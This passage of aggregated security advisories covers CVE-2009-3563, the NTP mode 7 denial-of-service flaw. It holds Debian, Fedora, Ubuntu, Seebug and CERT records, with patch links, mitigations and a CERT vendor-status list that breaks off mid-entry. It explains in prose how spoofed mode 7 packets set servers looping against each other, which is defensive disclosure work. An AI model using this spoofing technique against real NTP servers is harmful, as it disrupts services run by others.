\u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nRedHat\r\n------\r\nRedHat\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08RHSA-2009:1648-01\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nRHSA-2009:1648-01\uff1aModerate: ntp security update\r\n\u94fe\u63a5\uff1ahttps://www.redhat.com/support/errata/RHSA-2009-1648.html\r\n\r\nUniversity of Delaware\r\n----------------------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.ntp.org/downloads.html", "published": "2009-12-12T00:00:00", "type": "seebug", "title": "NTP MODE_PRIVATE\u62a5\u6587\u8fdc\u7a0b\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3563"], "modified": "2009-12-12T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15050", "id": "SSV:15050", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:11:55", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA-1908-1 security@debian.org\nhttp://www.debian.org/security/ Nico Golde\nDecember 8th, 2009 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : ntp\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nDebian bug : 560074\nCVE ID : CVE-2009-3563\n\nRobin Park and Dmitri Vinokurov discovered that the daemon component of\nthe ntp package, a reference implementation of the NTP protocol, is\nnot properly reacting to certain incoming packets.\n\nAn unexpected NTP mode 7 packets (MODE_PRIVATE) with spoofed IP data can lead\nntpd to reply with a mode 7 response to the spoofed address. This may result\nin the service playing packet ping-pong with other ntp servers or even itself\nwhich causes CPU usage and excessive disk use due to logging. An attacker\ncan use this to conduct denial of service attacks.\n\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 1:4.2.2.p4+dfsg-2etch4.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1:4.2.4p4+dfsg-8lenny3.\n\nFor the testing (squeeze) and unstable (sid) distribution, this problem\nwill be fixed soon.\n\n\nWe recommend that you upgrade your ntp packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.dsc\n Size/MD5 checksum: 906 115e93f010e32aa1c90231461487503a\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg.orig.tar.gz\n Size/MD5 checksum: 2199764 ad746cda2d90dbb9ed06fe164273c5d0\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4.diff.gz\n Size/MD5 checksum: 182632 80aa236bd0a39096c5e5d462c0b9b279\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp-refclock_4.2.2.p4+dfsg-2etch4_all.deb\n Size/MD5 checksum: 28596 df605f89c08a01116c2ff799777f6a2c\n http://security.debian.org/pool/updates/main/n/ntp/ntp-simple_4.2.2.p4+dfsg-2etch4_all.deb\n Size/MD5 checksum: 28594 0c683ac7e7f5b131515f956aed87de3d\n http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.2.p4+dfsg-2etch4_all.deb\n Size/MD5 checksum: 912886 1af5a623cbf5f145f34dab7beefcd183\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_alpha.deb\n Size/MD5 checksum: 408070 ca33235c58a26ad1a839084b4f2d385c\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_alpha.deb\n Size/MD5 checksum: 65056 e527eb4c93d427c025374805fb5288cb\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_amd64.deb\n Size/MD5 checksum: 62258 13a4f4faaf699913e421c093e598f2a9\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_amd64.deb\n Size/MD5 checksum: 359384 1a289aa1f8439e2ef736cbf29bbe140f\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_arm.deb\n Size/MD5 checksum: 59784 8a84cae4e8f643cbd3ed684e5a7eb0ff\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_arm.deb\n Size/MD5 checksum: 344316 57066e8abfdf51c36d63600c993f3c20\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_hppa.deb\n Size/MD5 checksum: 372448 0b8f9b90bb03a2f572066fe8b47c7202\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_hppa.deb\n Size/MD5 checksum: 62160 88dc964fa357187ddc97d37513a863ba\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_i386.deb\n Size/MD5 checksum: 58316 90fc92e7a8f6582ee21076849ae0dfba\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_i386.deb\n Size/MD5 checksum: 333772 e5fbae24686d444fff118f3ce9cc45db\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_ia64.deb\n Size/MD5 checksum: 523358 0032e3c9bcb4a27a312a47fb95d1f9a1\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_ia64.deb\n Size/MD5 checksum: 74712 72c1b601f4beb41c6c04a54534ba9c51\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mips.deb\n Size/MD5 checksum: 382868 2980d63a9ca6344e6a76698d0e808f8c\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mips.deb\n Size/MD5 checksum: 63610 d523930b9b98d6353bf4e6fb7d7e57f5\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_mipsel.deb\n Size/MD5 checksum: 64134 e4042de5af081701911a7cece69c6cce\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_mipsel.deb\n Size/MD5 checksum: 390142 b50dc2bd5970f224b6994c460f8f560a\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_powerpc.deb\n Size/MD5 checksum: 358860 432b58ad621ac266455f7e5124d2eb1c\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_powerpc.deb\n Size/MD5 checksum: 61760 2c9dd1b3a8d61bece4f420e533b7a6eb\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_s390.deb\n Size/MD5 checksum: 350300 40a28748d5016101c179bd4a22c08390\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_s390.deb\n Size/MD5 checksum: 61242 14c08344bfd0561ced0d54aa2cd23a2e\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.2.p4+dfsg-2etch4_sparc.deb\n Size/MD5 checksum: 58584 0e573ef22b1514b12e01fa6ac2bb1ddb\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.2.p4+dfsg-2etch4_sparc.deb\n Size/MD5 checksum: 332284 4589ff44bc97ad73513d8ba5419c7845\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.dsc\n Size/MD5 checksum: 1459 81e70fe84f27e3bfabdbfb9f3122492b\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz\n Size/MD5 checksum: 2835029 dc2b3ac9cc04b0f29df35467514c9884\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3.diff.gz\n Size/MD5 checksum: 300928 b568f39eda3e46f27239ad44021f968c\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp-doc_4.2.4p4+dfsg-8lenny3_all.deb\n Size/MD5 checksum: 927658 8db03976b7b105057ead2da4bae09219\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_alpha.deb\n Size/MD5 checksum: 66706 9213dcba9a99fa363f0ce48c514a008b\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_alpha.deb\n Size/MD5 checksum: 538492 de37b288ef933f34446ab78a8d8ed76b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_amd64.deb\n Size/MD5 checksum: 63836 a0b5b030abe6a6c32591366febcec1d1\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_amd64.deb\n Size/MD5 checksum: 479472 277efe45a76a24da6ca14ae581d0a3a2\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_arm.deb\n Size/MD5 checksum: 61220 d4905eea52795330e517acca903059f4\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_arm.deb\n Size/MD5 checksum: 448164 cc28e545eb359eba225abfcb02cc4377\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_armel.deb\n Size/MD5 checksum: 62794 e5a43b8076a77643cc742348f0e63de1\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_armel.deb\n Size/MD5 checksum: 458908 3721b8d7b7a67b31db6249521dd9f015\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_hppa.deb\n Size/MD5 checksum: 63872 53a7009f1888c06b162c258a9bb5d6fb\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_hppa.deb\n Size/MD5 checksum: 485744 b8e950ba02a13ecacfe332db56c0c887\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_i386.deb\n Size/MD5 checksum: 434672 6ccfb060f39cc56f39ef8806865b767d\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_i386.deb\n Size/MD5 checksum: 60114 2f0914ae2191ddf3f74529bc896299da\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_ia64.deb\n Size/MD5 checksum: 707812 eb960c732894d56589ba62d76c5ba568\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_ia64.deb\n Size/MD5 checksum: 76366 6b5b986e454276661e8b483f095bd16e\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mips.deb\n Size/MD5 checksum: 64116 ab287c70d2c2daf7b1a8808db8dcedc9\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mips.deb\n Size/MD5 checksum: 490394 0009cb5333123767dc3afcde682d9e10\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_mipsel.deb\n Size/MD5 checksum: 500786 3b842b738e616f301c31cd025c595235\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_mipsel.deb\n Size/MD5 checksum: 64776 fd31cdaa7a78d7e3fa072b746dd98e01\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_powerpc.deb\n Size/MD5 checksum: 490620 21d03b435c327c2884fe587a56fe10fb\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_powerpc.deb\n Size/MD5 checksum: 65470 6966f71002ae63c104e608af1a7daa3a\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/n/ntp/ntpdate_4.2.4p4+dfsg-8lenny3_s390.deb\n Size/MD5 checksum: 63678 4b143ad2444681bdb1ee44d395996a29\n http://security.debian.org/pool/updates/main/n/ntp/ntp_4.2.4p4+dfsg-8lenny3_s390.deb\n Size/MD5 checksum: 474000 6fb44a33381b0d582599eb33896d8f0f\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2009-12-08T19:07:36", "published": "2009-12-08T19:07:36", "id": "DEBIAN:DSA-1948-1:EA724", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00271.html", "title": "[SECURITY] [DSA 1948-1] New ntp packages fix denial of service", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package and the ntpdate program is in the ntpdate package. The documentation is in the ntp-doc package. ", "modified": "2009-12-11T18:14:28", "published": "2009-12-11T18:14:28", "id": "FEDORA:EE41C10F85C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: ntp-4.2.4p8-1.fc12", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1252", "CVE-2009-3563"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts ntp-wait and ntptrace are in the ntp-perl package and the ntpdate program is in the ntpdate package. The documentation is in the ntp-doc package. ", "modified": "2009-12-11T18:23:49", "published": "2009-12-11T18:23:49", "id": "FEDORA:94BE010F85C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: ntp-4.2.4p7-3.fc11", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-09T00:27:25", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563"], "description": "Robin Park and Dmitri Vinokurov discovered a logic error in ntpd. A remote \nattacker could send a crafted NTP mode 7 packet with a spoofed IP address \nof an affected server and cause a denial of service via CPU and disk \nresource consumption.", "edition": 5, "modified": "2009-12-08T00:00:00", "published": "2009-12-08T00:00:00", "id": "USN-867-1", "href": "https://ubuntu.com/security/notices/USN-867-1", "title": "Ntp vulnerability", "type": "ubuntu", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:42:18", "bulletinFamily": "info", "cvelist": ["CVE-2009-3563"], "description": "### Overview \n\nNTP contains a vulnerability in the handling of mode 7 requests, which can result in a denial-of-service condition. \n\n### Description \n\nNTP mode 7 (MODE_PRIVATE) is used by the ntpdc query and control utility. In contrast, ntpq uses NTP mode 6 (MODE_CONTROL), while routine NTP time transfers use modes 1 through 5. Upon receipt of an incorrect mode 7 request or a mode 7 error response from an address that is not listed in a \"`restrict ... noquery`\" or \"`restrict ... ignore`\" segment, ntpd will reply with a mode 7 error response and log a message.\n\nIf an attacker spoofs the source address of ntpd host A in a mode 7 response packet sent to ntpd host B, both A and B will continuously send each other error responses, for as long as those packets get through. \n \nIf an attacker spoofs an address of ntpd host A in a mode 7 response packet sent to ntpd host A, then host A will respond to itself endlessly, consuming CPU and logging excessively. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to cause a denial-of-service condition on a vulnerable NTP server. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in NTP 4.2.4p8. Please check with your vendor for an update, or you may download [NTP 4.2.4p8 from ntp.org](<http://www.ntp.org/downloads.html>). \n \n--- \n \n \n**Configure NTP to limit source addresses** \n \nBy using \"`restrict ... noquery`\" or \"`restrict ... ignore`\" entries in the `ntp.conf` file, ntpd can be configured to limit the source addresses to which it will respond. \n \n**Filter NTP mode 7 packets that specify source and destination port 123** \n \nIn most cases, ntpdc mode 7 requests will have either a source or destination port of 123, but not both. \n \n**Use anti-spoofing IP address filters** \n \n[RFC 2827 (BCP 38)](<http://tools.ietf.org/html/rfc2827>) describes network ingress filtering, which can prevent UDP traffic claiming to be from a local address from entering your network from an outside source. Some ISPs may employ unicast reverse path filtering ([uRPF](<http://tools.ietf.org/html/rfc3704>)) to limit the spoofed traffic that can enter your network. \n \n--- \n \n### Vendor Information\n\n568372\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Inc. Affected\n\nNotified: October 26, 2009 Updated: October 27, 2009 \n\n**Statement Date: October 27, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Cisco Systems, Inc. __ Affected\n\nNotified: October 26, 2009 Updated: December 13, 2009 \n\n**Statement Date: December 02, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nPlease find below our bug id details:\n\nCisco IOS and Cisco IOS XE Software (Cisco Bug ID: CSCtd75033) \nCisco Nexus Series Switches (Cisco Bug IDs: CSCsz81239, CSCtd15613, CSCtd15613) \nCisco Application Control Engine appliance (Cisco Bug ID: CSCsz93757) \nCisco Unified Communications Manager - Linux (Cisco Bug ID: CSCtc99277) \nCisco Telepresence Systems (Cisco Bug ID: CSCtc99290) \nCisco Wide Area Application Services (WAAS) (Cisco Bug ID: CSCtc99299) \nCisco Meeting Place Server (Cisco Bug ID: CSCtc99306) \nCisco Mobility Services Engine (Location Appliance) (Cisco Bug ID: CSCtc99318) \nCisco ACE XML Gateways (Cisco Bug ID: CSCtd15631) \nCisco IP Interoperability and Communications System (IPICS) (Cisco Bug ID: CSCtd15623) \nCisco MDS 9500 Series (Cisco Bug ID: CSCtd15595) \nCisco Digital Media Players (Cisco Bug ID: CSCtd15641)\n\n### Vendor Information \n\nPlease see [Cisco Vulnerability Alert 19540](<http://tools.cisco.com/security/center/viewAlert.x?alertId=19540>).\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/viewAlert.x?alertId=19540>\n\n### Debian GNU/Linux __ Affected\n\nNotified: October 26, 2009 Updated: December 08, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://security-tracker.debian.org/tracker/CVE-2009-3563>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23568372 Feedback>).\n\n### Gentoo Linux __ Affected\n\nNotified: October 26, 2009 Updated: December 10, 2009 \n\n**Statement Date: December 10, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see: <http://bugs.gentoo.org/show_bug.cgi?id=290881>.\n\n### Vendor References\n\n * <http://bugs.gentoo.org/show_bug.cgi?id=290881>\n\n### Meinberg Funkuhren GmbH & Co. KG __ Affected\n\nUpdated: December 16, 2009 \n\n**Statement Date: December 15, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nwe announced on Friday that our LANTIME NTP Time Server Appliances are affected as well:\n\n<http://www.meinberg.de/english/news/lantime-firmware-update-ntp-security-problem-with-mode-7-packets.htm> \n \nAdditionally, Meinberg provides an easy-to-use Windows installer for the reference implementation of NTP, i.e. we created an installer that installs the original ntpd from ntp.org on Windows machines. We also updated this installer to include 4.2.4p8 and nicknamed it \"lennon\" (in memory of the death of John Lennon, wo died on December 8th - the day when this vulnerability has been announced. \n \n<http://www.meinberg.de/english/news/software-new-ntp-version-for-windows-4-2-4p8-security-update.htm>\n\n### QNX Software Systems Inc. __ Affected\n\nNotified: October 26, 2009 Updated: December 07, 2009 \n\n**Statement Date: December 07, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe NTP feature of the Neutrino operating system (version 6.4.1 and earlier) is vulnerable. This issue will be corrected in the upcoming Neutrino 6.4.2 operating system release. Please contact your QNX representative regarding earlier OS product releases.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Red Hat, Inc. Affected\n\nNotified: October 26, 2009 Updated: December 08, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Sun Microsystems, Inc. __ Affected\n\nNotified: October 26, 2009 Updated: January 22, 2010 \n\n**Statement Date: January 22, 2010**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSolaris is impacted by CERT Vulnerability Note VU#568372: 'NTP mode 7 denial-of-service vulnerability'. We have published Sun Alert 275590 for this issue.\n\n<http://sunsolve.sun.com/search/document.do?assetkey=1-66-275590-1>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Vendor References\n\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-66-275590-1>\n\n### The SCO Group Affected\n\nNotified: October 26, 2009 Updated: October 29, 2009 \n\n**Statement Date: October 29, 2009**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Ubuntu __ Affected\n\nNotified: October 26, 2009 Updated: December 09, 2009 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nPlease see <http://www.ubuntu.com/usn/USN-867-1>.\n\n### Vendor References\n\n * <http://www.ubuntu.com/usn/USN-867-1>\n\n### Computer Associates __ Not Affected\n\nNotified: October 26, 2009 Updated: April 27, 2010 \n\n**Statement Date: March 23, 2010**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nCA has reviewed the VU#568372 information you have provided, and we have determined that CA products are NOT VULNERABLE.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Extreme Networks __ Not Affected\n\nNotified: October 26, 2009 Updated: February 03, 2010 \n\n**Statement Date: November 30, 2009**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nExtreme Products dont provide NTPD service. The devices only have NTP clients. Hence, the vulnerability VU#568372 is not applicable to Extreme Networks products.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Force10 Networks, Inc. Not Affected\n\nNotified: October 26, 2009 Updated: July 22, 2011 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Corporation __ Not Affected\n\nNotified: October 26, 2009 Updated: April 05, 2010 \n\n**Statement Date: March 29, 2010**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe Microsoft W32time implementation does not use Mode 7.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### PePLink __ Not Affected\n\nNotified: October 26, 2009 Updated: December 04, 2009 \n\n**Statement Date: October 27, 2009**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nPeplink products are not vulnerable to this attack for the following reason:\n\n* Peplink products do not use ntpd.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### SafeNet __ Not Affected\n\nNotified: October 26, 2009 Updated: October 28, 2009 \n\n**Statement Date: October 28, 2009**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have confirmed that no SafeNet products are affected by this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 3com Inc Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ACCESS Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### AT&T Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Alcatel-Lucent Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Avaya, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Barracuda Networks Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Belkin, Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Borderware Technologies Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Charlotte's Web Networks Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Check Point Software Technologies Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Clavister Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Conectiva Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Cray Inc. Unknown\n\nNotified: October 26, 2009 Updated: October 26, 2009 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the 